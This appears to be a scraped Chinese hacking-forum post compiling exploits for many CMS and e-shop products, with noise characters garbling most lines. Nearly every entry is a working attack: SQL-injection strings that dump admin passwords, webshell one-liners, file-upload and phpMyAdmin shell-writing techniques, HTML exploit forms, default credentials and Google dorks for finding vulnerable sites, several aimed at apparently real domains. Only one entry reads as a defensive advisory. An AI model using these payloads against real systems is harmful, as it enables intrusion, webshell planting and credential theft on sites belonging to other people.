启航企业建站系统 cookie注入漏洞通杀所有版本
" a! z: J& s' E+ p, q$ U# w0 f8 @! x& O, M1 H1 }8 |
直接上exploit:
' g) Z+ I# G1 f# @javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
# ] g6 N# U. b7 w/ O" mtest:http://www.tb11.net/system/xitong/shownews.asp?id=210
|& m! n: l; ~# b# t# Y5 w--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- f. [) _9 U8 i5 ]+ G( e, @Asprain论坛 注册用户 上传图片就可拿到webshell
: o& F: N* X' U
3 @( j0 B5 e, l! eAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。: O& w! w9 x# N1 `2 S
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
, M! U; R4 A+ _* e2.gif 为一小图片文件,一定要小,比如qq表情图片. I9 I) S. f2 S0 [5 [
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
k5 @' f9 n) }, h4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了+ O/ R1 u8 C# ]! g
5.q.asp;.gif
9 D" q5 A s$ S C4 ?" Q+ Cgoogle:Powered by Asprain! i- i# M& X9 h- Z. H' G" b7 c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, ^- x7 I# X+ \% j* G
' Q+ G% q" N* GShopNum1全部系统存在上传漏洞。9 G O$ `6 V9 L+ c- K
: v. g2 w( H- M" h* s首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。4 i P& ~2 ^! Q" h* l
按说明 提示登录后台。。
* v+ B7 P# C% |8 k6 G在后台功能页面->附件管理->附件列表$ ?) G& F! J0 @+ k9 N
可以直接上传.aspx 后缀木马
/ W0 h" B j6 e1 N; Z8 Y r- v. Phttp://demo.shopnum1.com/upload/20110720083822500.aspx
3 V! I5 ]+ I; L# Y( [0 F+ k/ @--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 c. @5 m" E5 O" a) |! O& a3 i/ v
1 o% ]0 N+ F* S b牛牛CMS中小企业网站管理系统 上传漏洞) C9 f1 H% W' Y2 N# V G
) t! k0 z# z8 t/ R" V
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。 s5 b/ Z7 k% z
后台:admin/login.asp
; y5 G2 k! a; D$ O* P! Rewebeditor 5.5 Nday4 A% O# A" F, g Q- N, z
exp:
v' Q) \- u; Z( x& [% w<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
- B$ Z3 @: R! d# ?<input?type=file?name=uploadfile?size=100><br><br>?, \8 [5 X4 n# U- p8 S- O* C+ s2 ?
<input?type=submit?value=upload>?
% C. K; p z! w</form>
' `$ N T8 \. x2 H Wps:先上传小马.' Y4 I2 d- E6 l4 M# C' }
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
/ k1 g) L( S3 c; _4 c" V7 R' `5 p( o3 h/ x0 ]9 ^$ F! Z8 I7 \# e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 @7 w% n& D, j4 i% q
5 v4 A! l, ?8 X4 N: f5 TYothCMS 遍历目录漏洞
7 y$ K/ X8 S: S; w+ Z4 H! f, c! `. {- Q0 D1 S- z9 s' @5 e' [
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
* g1 S& x" N; a% i默认后台:admin/login.asp
! i, \5 j; ^& |* g: Z遍历目录:) `% p; u# Q$ V% F
ewebeditor/manage/upload.asp?id=1&dir=../6 _' ]1 M% V" q7 c7 H& I9 O5 H
data:4 h& ?: C+ o, @& n/ q u, e
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa' ]8 Q3 t# |' D6 u5 o8 `
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 o3 ?2 X) N, M* K) y+ w8 S3 @2 O* ]: E e1 a) H3 }) m
Net112企业建站系统 1.0# @. C7 v, p: n
9 Z+ W3 T( e6 O* Q, R1 P
源码简介:
* j0 W$ P8 O; ^/ ENet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。9 P$ `7 s- s% D4 W" {
添加管理员:
- C, `* \3 D1 F& M7 A' J7 Uhttp://www.0855.tv/admin/admin.asp?action=add&level=2
, j) B0 V6 j/ w3 L$ s其实加不加都不是很重要,后台文件都没怎么作验证。
) E' T; ~9 [' D; D4 P9 z+ U1 P上传路径:
6 D& w, a; F7 J3 s" W( P$ ~3 xhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200% O6 S2 q+ v' i! I
http://www.0855.tv/inc/Upfile.asp?Stype=2# o" g2 {% A5 S+ S! O R
怎么利用自己研究。/ S8 w; l, V. }2 h/ O
遍历目录:$ A% D$ f2 G4 p* K4 M
http://www.0855.tv/admin/upfile.asp?path=../..9 z/ l6 O z0 P
如:
, U3 x! S2 q) {" H( Phttp://www.0855.tv/admin/upfile.asp?path=../admin
$ d+ P, Z/ q s) Jhttp://www.0855.tv/admin/upfile.asp?path=../data5 v8 a3 ^2 l* H# V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* m9 z4 a- J6 \8 W% T, |! J* c9 o& m$ o" u7 b! Q) H$ H
易和阳光购物商城通杀 上传漏洞. L* ~- `) w& B1 L8 Z1 z- c3 g2 A
8 h. f& L8 m: U, z: m, s
前提要求是IIS6.0+asp坏境。
5 y' b2 {2 M( [+ L; f漏洞文件Iheeo_upfile.asp
) D0 u$ w# P! D2 t% M6 m过滤不严.直接可以iis6.0上传
( `8 M. x+ l! H# j; E! \' B把ASP木马改成0855.asp;1.gif6 j6 u# l7 r$ x3 G6 L+ O4 B% x% D
直接放到明小子上传
3 \: ?+ c$ C/ qGoogle搜索:inurl:product.asp?Iheeoid=: Z# s% L' f! N1 j# H$ j7 v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 {+ C) H* P% g
/ _1 n' w; F( B! f" k; Gphpmyadmin后台4种拿shell方法
8 z! ]9 T; Z; L1 D0 B! U* F% N r+ f* j: P( k9 i/ |7 D
方法一:1 b! S+ |7 N/ A; s# E$ B; ~* a' O
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );3 h: p6 i9 s6 I( a0 X
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
$ [0 U! k/ ?& x2 LSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
! D1 ^: |3 r V/ x( ` e1 F( E----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php1 E1 `) ~$ N2 M1 r/ E
一句话连接密码:xiaoma
& c- k7 R) l1 w! L0 ? l/ Y方法二:* p; w; \- c B5 t& y* `4 W5 D
Create TABLE xiaoma (xiaoma1 text NOT NULL);7 W$ j) O# q% T) W0 V0 t
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');2 _, F6 Z! ~/ k
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';4 n9 M) X2 K: X/ U" m
Drop TABLE IF EXISTS xiaoma;
% _- Y) o2 \* N方法三:
: M7 {6 q! z: Z# d5 D' j, X8 L读取文件内容: select load_file('E:/xamp/www/s.php');2 e7 \; B, M# e
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
$ `" B- I6 h- ~) H) _cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
4 h# O7 o* N4 M方法四:
) D* J( ]- F. w% i; Qselect load_file('E:/xamp/www/xiaoma.php');
% k6 }0 Y" Q" n bselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
" ]6 a1 z. m4 y" ^3 C# J+ v$ r然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
b7 {: D; o% u--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ [* P& E: a5 M n& m- _
8 U4 y; v! R5 T1 c) @传信网络独立开发网站源码0day漏洞
+ e7 B# j& R3 Z+ D" p
1 R- ~3 V5 X* ^# W+ `2 h8 o; z后台system/login.asp; ? x: J, R* |2 g! s; _
进了后台有个ewebeditor. m0 F. H9 T9 Z8 t' V) N8 v/ c4 B
Google 搜索inurl:product1.asp?tyc=0 R. b" Y" } T& ^
编辑器漏洞默认后台ubbcode/admin_login.asp& l/ {: _' o) x1 x/ t. \1 t
数据库ubbcode/db/ewebeditor.mdb
0 T$ g9 h# Y+ o+ C E& [8 `默认账号密码yzm 111111
& u6 \; P' w c F
, d' r6 a* \# N1 s0 H$ X/ Q& ^拿webshell方法
- Y( N! P$ Y1 X) I0 x# R `登陆后台点击“样式管理”-选择新增样式 , I) F* t' T6 {1 v* D$ V
样式名称:scriptkiddies 随便写 a, n9 Q, _. \! @! C! S- a' ~5 j
路径模式:选择绝对路径 : Q! ^5 \2 \7 C2 P5 T
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx6 F4 D* e9 `0 h$ i# s9 I) ?! d; g, d
图片类型比如就是我们要上传的ASP木马格式
8 c% K4 i, C _% s) w* E上传路径:/
; u, I0 K: J7 h) Q- { \图片限制:写上1000 免的上不了我们的asp木马
; r' C5 T; f' _上传内容不要写
5 t/ y+ }: X$ S可以提交了 : i/ i: _; |; P2 C" q
样式增加成功!
7 H2 r( C! Z" q# ]" ^' _9 o返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
& \* I7 H( L% E按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置8 C4 y( j8 q2 _# ?1 c1 F2 D
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies. L2 h* [; D' K; V1 H6 b- e
上ASP木马 回车 等到路径
. W8 J; e3 t, _9 s2 d. |3 b2 C& X# | K$ S; \4 J4 n! i
后台:system/login.asp
- j/ A) z, }, K" h' s6 BExp:8 g' o( E5 d9 i9 ~0 Q/ N
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
/ r; n: }/ @0 H' b/ l* {; f; p测试:
# Y; d0 ]5 n+ J; D9 s$ Xhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master0 J) t/ K, C$ n" k5 g
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master: D* ~) S+ i: g0 b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; Z% `, g1 U# C/ B( n6 U$ Z! c
+ d( G1 ]! H" n. E. ~5 ]) A3 y) {/ ?foosun 0day 最新注入漏洞
$ g, t2 E* @1 d8 j( r4 H
# H. b- [! o+ j3 k H漏洞文件:www.xxx.com/user/SetNextOptions.asp! _( F" Q1 u6 k2 ]
利用简单的方法:2 E' u& G9 f9 p* I
暴管理员帐号:
- i4 r+ J( F$ k( @# Mhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
( W3 W* d8 V5 V3 C1 ^( o! k暴管理员密码:$ \. H3 W% i! L% m+ F2 h- V q4 f& s
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,2 n, K+ V, h) n' V+ M
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; K i! I0 z2 n: j: p8 p
! O8 ^5 W4 ^5 r5 X$ t: u. x! L' @网站程序的版权未知!/ F' F1 X+ J8 a! `$ ^
/ j2 l, e9 Q4 s; o. o默认网站数据库:
5 y, E* k3 h: [ lwww.i0day.com/data/nxnews.mdb
: ], b: [1 h4 P$ x3 A% kewebeditor 在线编辑器:2 M3 D1 g6 V4 L" n( A
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
2 a; w! h; Z* f e, m' Q登录地址:ewebeditor/admin_login.asp* f" K" o1 B( Z6 d
默认密码:admin admin: ?. R; g( b$ u
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data; k% k [/ e4 p
* L7 m# G& _2 v8 g. j XSql注入漏洞:+ G9 V. K6 u& n; [+ r! C" E
http://www.i0day.com/detail.asp?id=12% d( H- o# O' i' |4 y- N
exp:
4 \/ v( s% S# i H% Uunion select 1,admin,password,4,5,6,7,8 from admin
% w$ c' k0 p5 b/ g7 h% _- }8 n- z爆出明文帐号/密码3 u& O0 m) c3 h2 v
7 ?, y* {- Y" j5 Q' ~2 e
上传漏洞:7 s" J8 L9 H' U1 |
后台+upfile.asp. g7 S% Q9 N. j% ^- V
如:
0 O) E* S( E% [0 X! ^http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
1 B$ E% o+ g( f2 ]' ~shell的地址:网址+后台+成功上传的马
0 J+ J$ O) v% \+ r G, t9 d0 Ugoogle:inurl:news.asp?lanmuName=7 a7 l$ e7 z1 \3 ~4 u" ]) _
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 \( L. [' z, F6 x% D
2 _7 [- i4 a& c6 J Q$ k$ Ldedecms最新0day利用不进后台直接拿WEBSHELL# E1 ~6 W/ [+ h7 a W: Z( p
9 E! m- P6 C% i8 t拿webshell的方法如下:+ b/ v. R& ~2 [' K# L' f5 ?: n
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell., i) D8 c1 c3 D( c
前题条件,必须准备好自己的dede数据库,然后插入数据:/ A& x) _& N3 B" |
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); % o# |' m. O' Z
) W9 b: `2 e* Y+ I; i& n' x0 m: l
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。8 E$ k$ C4 ^- e2 Z
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"># a" S% y7 Y$ c) {; j j
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />: d9 t: _: T" l5 L. x
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />6 y& V7 C* |, ~3 S$ s
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />1 ~1 P, B$ i- T0 a8 s; R2 R
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
2 n8 R- o" h/ d9 v: i<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br /> [( G' {4 o3 R8 Y
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
! K6 q( P3 a+ e {2 o; v<input type="text" value="true" name="nocache" style="width:400">/ J+ q4 X5 y' Z& A7 @# [; K
<input type="submit" value="提交" name="QuickSearchBtn"><br />
8 P8 H% S) c& D</form>
1 T5 m9 f, `. l0 t' a% {<script>
! \8 s3 H* L+ Yfunction addaction() ^2 e1 \+ B4 q" C3 e
{: ~- ^" g; K/ H7 h/ X, B
document.QuickSearch.action=document.QuickSearch.doaction.value;
n. ~; y6 u3 \}& C4 w }( K/ U# @
</script>
g0 s; ^& k/ z0 G" |----------------------------------------------------------------------------------------------------------------------------------------------- E7 @8 h7 G5 I* C J* j
$ Y3 I1 \4 V/ p3 T* N: Vdedecms织梦暴最新严重0day漏洞# w4 m2 P2 P, x+ m5 a% s/ {" v. N
bug被利用步骤如下:
3 {; U. j+ A- f9 l: L$ B3 ?4 Dhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
+ @1 ~, D7 e% v6 I& L6 k R7 X把上面{}上的字母改为当前的验证码,即可直接进入网站后台。4 W, ]: H2 d7 v2 H% A
-------------------------------------------------------------------------------------------------------------------------------------------8 `6 i: @, R) m0 F
# |+ E# t9 Y6 ~; H( H& p9 I
多多淘宝客程序上传漏洞
- P; c6 o3 X# W漏洞页面:6 u( D% m( o4 ]: x" }! Z* a
admin\upload_pic.php, {* j9 e Q# X
传送门:' z2 V. r+ t8 w3 Q
http://www.www.com/admin/upload_pic.php?uploadtext=slide14 h2 K2 d! `: q# B
PS:copy张图片马 直接 xxx.php 上传抓包地址!
/ p6 q0 ~ \: Q( R/ v; m------------------------------------------------------------------------------------------------------------------------------------------------------
w9 _" @5 J2 y: W
, T9 v) w, s/ K- Y无忧公司系统ASP专业版后台上传漏洞) f, d0 {6 }8 E1 A; J, f
漏洞文件 后台上传
0 q# s4 W/ K+ u( Wadmin/uploadPic.asp; W! k- M1 H+ w' H" t7 O
漏洞利用 这个漏洞好像是雷池的
$ l7 t/ f% B! |* ^. g' _3 vhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
& [! r8 P3 s/ t \; S等到的webshell路径:
; B0 m, _5 R$ R, N/UploadFiles/scriptkiddies.asp;_2.gif5 @% p- ]0 D+ u1 C9 W3 o: ]. d
---------------------------------------------------------------------------------------------------------------------------------------------------
+ \6 l; T. S2 f# j. a, P3 \- A& h+ f5 a5 ^4 {
住哪酒店分销联盟系统2010
! Y* _, X6 o/ i. l' M* f; N0 ~9 f, VSearch:1 H) j9 `1 k$ q1 S6 ^0 r6 N
inurl:index.php?m=hotelinfo* N$ C# z2 ?& X( Y3 Y
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin* S4 i0 |8 s0 ~& X1 R
默认后台:index.php?m=admin/login- e3 {: n. b* |0 F
--------------------------------------------------------------------------------------------------------------------------------------------------
2 e/ y0 n3 ]2 W B1 L
" H9 g' x' V8 x" G/ binurl:info_Print.asp?ArticleID=
- Q- Y6 w, q3 q后台 ad_login.asp
5 G( E( I# W9 E/ b4 G& b爆管理员密码:
! ~% I* u3 M, |union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin' R- K4 l* t6 r; @2 H
------------------------------------------------------------------------------------------------------------------------------------------------------------
5 @' m$ P& c8 o
9 P) k2 H; T- t/ e- B搜索框漏洞!) \* S; d, B0 s) L7 w3 Y
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='" o( V) B0 y+ X9 ^" C: r
-------------------------------------------------------------------------------------------------------------------------------------------------------- q* N9 F- n- s" O* l0 Y2 `
1 a8 `8 O3 |6 h- J7 w. x
关键字:+ M' s- \, C* T& p5 {) k. w
inurl:/reg_TemletSel.asp?step=20 e+ y( e9 h& |6 f* N+ Z8 |- R
或者5 f) ?. {* `( d
电子商务自助建站--您理想的助手7 Z$ d' D: K% |. w
-------------------------------------------------------------------------------------------------------------------------------------------------
1 t0 {1 q6 Z) Q# E' V! ]3 o! V1 s4 R1 B' y- n# f2 v, l
iGiveTest 2.1.0注入漏洞# H% ]* i) }" A- J# u" D+ q0 T
Version: <= 2.1.0
/ g% E0 C" _( p: a. [, i, @# Homepage: http://iGiveTest.com/
/ g+ x, k M8 m5 k4 F6 h8 I谷歌关键字: “Powered by iGiveTest”
: X9 Z. Z# R; ?8 X( @% ?: Y! a/ n随便注册一个帐号。然后暴管理员帐号和密码
, N# |$ P( C3 V* U0 Bhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
' F/ X& G1 M% s s------------------------------------------------------------------------------------------------------------------------------------------------4 J+ T+ R1 Q/ w1 O! A" H
8 q) I- r+ d3 R3 WCKXP网上书店注入漏洞
. U q9 Q/ h$ n. o9 M5 h工具加表:shop_admin 加字段:admin1 O0 \" i5 H- y+ {' M7 [
后台:admin/login.asp # h: `, n3 K% W* Y" @# O
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/8 ?1 D, U$ }" d; d+ f
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
4 ?( ^3 M4 Q, t--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% g& h: j, g# ?; _: T" {9 N9 d! S: H9 e+ t$ o& v( Q
段富超个人网站系统留言本写马漏洞3 ?+ u$ t/ {4 D t& Y
源码下载:http://www.mycodes.net/24/2149.htm* G. R+ c# I, { C# y
addgbook.asp 提交一句话。" [$ B3 [8 r+ W+ J' b, u V
连接: http://www.xxxx.tv/date/date3f.asp
/ z: f7 v" J) ?( i8 s# z5 J9 [google:为防批量,特略!
! l8 _1 v( z# k! x) Q; F-------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 a+ i; [' [5 ~2 ~6 }$ Q
4 `5 P4 K& a; j" u+ U: P" m0 |* Z
智有道专业旅游系统v1.0 注入及列目录漏洞2 v6 X ?8 U. Z+ G0 H' `5 v
默认后台路径:/admin/login.asp
& ?4 n6 y; y5 Q3 H/ S默认管理员:admin
t1 o# t" a) u' b: a- z4 U, ]1 ]默认密码:1234566 M7 M0 v6 m1 }% P0 @! n& `
SQL EXP Tset:. h0 V; M5 o# H7 u- U8 V/ M
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin4 {( G, i: p2 h3 s! E: @* B& G
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, m7 B" A4 s$ @7 D1 B% B; ^! }8 J$ y# b9 e# v# r( }
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
0 u* n( p, V- H) L$ ^* ^0 ?, K# hEXP:1 e- A3 E; x% D/ C4 Y. j& ]4 C
<title>eWebeditoR3.8 for php任意文件上EXP</title>- }, r, m2 o/ S9 c W/ Z
<form action="" method=post enctype="multip4 U, D( M2 U7 S6 A: {
art/form-data">
4 W# F0 \+ p8 }<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
A) S- {. y# A$ m* n) EURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
0 ?% D% |! {( M5 V<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 3 c8 S+ N- |" G# ]* B! `
file:<input type=file name="uploadfile"><br> 7 F5 [ f. q8 d* h3 J. W% D4 Q: u
<input type=button value=submit onclick=fsubmit()>
7 ~' `% d$ b8 J; H</form><br> : z: ~- l( m" A$ b F
<script> 3 e; O! t! p) g1 t+ C
function fsubmit(){ ; u1 v: } y0 |% q( a( Z! P
form = document.forms[0]; . w& ^: A8 L' \7 T
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; ; E2 [" p- p" {7 S5 s# h. C
alert(form.action);
. f {+ f0 w* ?form.submit();
& Z- d4 l4 z* Q* q) F- z# n3 J4 R} 1 v! [2 S5 J- ?9 d
</script>) D# t" b5 A n% ?# I
注意修改里面ewebeditor的名称还有路径。$ t7 S% Y; Z8 R/ [4 j8 E
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- _8 A$ p# O! L" l
2 }, G) X( G r) `) t( T
提交’时提示ip被记录 防注入系统的利用" e9 i m3 e7 [. R9 ^ B
网址:http://www.xxx.com/newslist.asp?id=122′! R- E% h3 M, E2 G/ N& L+ t% d; Z0 ~
提示“你的操作已被记录!”等信息。 C4 Y: T$ B1 u% o- l ]$ S
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
. j2 n: r3 P, r' J5 V0 a-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! p; \5 K) |$ e! p* K
$ i+ w0 z$ q& M" b7 ?9 q' A西部商务网站管理系统 批量拿shell-0day& \4 ]+ O9 B7 n+ V. m, W
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ; y5 J7 v) V& {/ m! g+ `
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
2 ^! c4 y; X/ O* _2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
- M) z0 }2 J% i! O# P. g( p3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
+ ^+ N. D- t& C---------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ i, C6 E4 ?: o" `2 S7 c
" `4 q, x) v' w( r: U5 EJspRun!6.0 论坛管理后台注入漏洞" [, Y7 J5 n& q; O$ E, Q
- X6 k1 ~' R; I! i, PSEBUG-ID:20787 发布时间:2011-04-30 影响版本:1 f. [$ R$ u4 Q4 ^7 W# }
JspRun!6.0
5 S# P) H; M, T$ g2 Q, _漏洞描述:
( y# ?% J4 ?4 X$ g U1 [) k( s" HJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。' K6 x4 n6 l, x+ n
在处理后台提交的文件中ForumManageAction.java第1940行' \" @7 V5 I D/ c3 Y% [% f* y
String export = request.getParameter("export");//直接获取,没有安全过滤
, U4 W% l0 @& [/ v0 Sif(export!=null){
+ @# J0 t8 V0 c, }4 o' lList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
8 R& R5 g# ]; m. Z7 h Kif(styles==null||styles.size()==0){0 P Q8 p' g( U$ z( n) T% n7 g
<*参考& q, R q2 Z6 V. x7 M, K7 C
nuanfan@gmail.com9 Y) x3 C* x. U. h8 Z* U
*> SEBUG安全建议:
3 ?- y9 U- L( h8 D+ Xwww.jsprun.net
8 U0 y& ?( s3 k: o' _, i(1)安全过滤变量export, U" W# L; \( ^' R
(2)在查询语句中使用占位符; _% B+ F& T9 K2 {4 N' P0 B, h. G1 e0 _
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! a9 U/ T) T+ ^5 y" S: |
& ]* Q. H4 n4 y) f, v/ ~- J1 U+ L乌邦图企业网站系统 cookies 注入# \) k: a- g* J5 M
) e: _+ Y# x4 t; h& }, _. y; e
程序完整登陆后台:/admin/login.asp
! f1 L6 F% G4 v默认登陆帐号:admin 密码:admin888
1 [4 z0 o5 _; h语句:(前面加个空格)- i: ^8 p( C* e; |4 l* F
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
& _0 v9 w4 _, N或者是16个字段:6 b6 U4 ^; T& g# {" g
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
7 M! J; T% p, u0 h2 i8 {爆不出来自己猜字段。% o3 ?% @2 {/ w2 W s2 y. | z$ K
注入点:http://www.untnt.com/shownews.asp?=88/ u5 \8 z5 s% Y1 D/ f
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
" G' J8 L) Y9 c3 ^5 G% r关键字:4 a+ D: g. G' D
inurl:shownews?asp.id=+ ~, z- `. \8 y, {
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( v, W* ~6 W- o, C( p- \! t1 u9 P! h7 }4 I
CKXP网上书店注入漏洞
3 U" _9 O- W5 ?: q& ^1 t+ C0 n) a Z( ? n/ _. m# ]# H
工具加表:shop_admin 加字段:admin
8 q# _+ M' t9 v1 s5 ~" V后台:admin/login.asp
0 u$ h* M, a0 R8 k1 F5 x登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
2 }' I* T4 @, n" ]$ v6 G Jinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
" C/ \ R9 X. C( L: x; L--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- J' k( q2 K; `' d' H5 Y
% b" `% O \9 D5 x9 y' jYxShop易想购物商城4.7.1版本任意文件上传漏洞3 z8 e9 P$ T/ s' {2 D4 ~" {
; [0 r. e& N% P9 J. Ahttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
. z' L+ `( R: r" b" O$ k% {跳转到网站根目录上传任意文件。! a% N1 O% P p' ~3 `2 @
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件. k- w" O) S4 {0 J6 P
